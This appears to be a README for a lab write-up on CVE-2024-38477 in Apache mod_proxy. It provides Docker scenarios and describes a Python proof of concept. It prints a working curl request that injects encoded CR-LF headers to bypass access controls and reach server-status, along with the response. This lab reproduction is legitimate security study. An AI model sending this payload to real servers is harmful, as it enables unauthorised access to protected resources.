31 lines
1.3 KiB
Markdown
31 lines
1.3 KiB
Markdown
# Introduction
|
|
This project provides a write-up regarding the **CVE-2024-38477**. To avoid to crash the production environment, the project contains two scenarios with the Apache2's mod_proxy vulnerable. These scenarios can be deployed with Docker.
|
|
|
|
This project contain a **Proof of Concept** with a python script for executing the attack against the server.
|
|
|
|
## Scenarios
|
|
### Scenario 1
|
|
The first scenario is a Perl scripts which can be execute with the Apache's mod CGI. For testing, I created a Perl script which can list all directories and files in the path specified in argument. The scenario can be deployed with Docker:
|
|
|
|
```
|
|
$ docker build -t cve-cgi scenario1/
|
|
$ docker run -p 8080:80 cve-cgi
|
|
```
|
|
|
|
With a simply curl, you can create a SSRF attack to the Apache server and to bypass the ACL:
|
|
|
|
```
|
|
$ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|
|
<html><head>
|
|
<title>Apache Status</title>
|
|
</head><body>
|
|
<h1>Apache Server Status for localhost (via 172.17.0.2)</h1>
|
|
```
|
|
|
|
### Scenario 2
|
|
The second scenario is a Python scripts executed with the CGI module.
|
|
|
|
## PoC
|
|
The Python script **cve.py** generates a new hostname using random values (ASCII letters, digits, and special characters) and sends it to the server.
|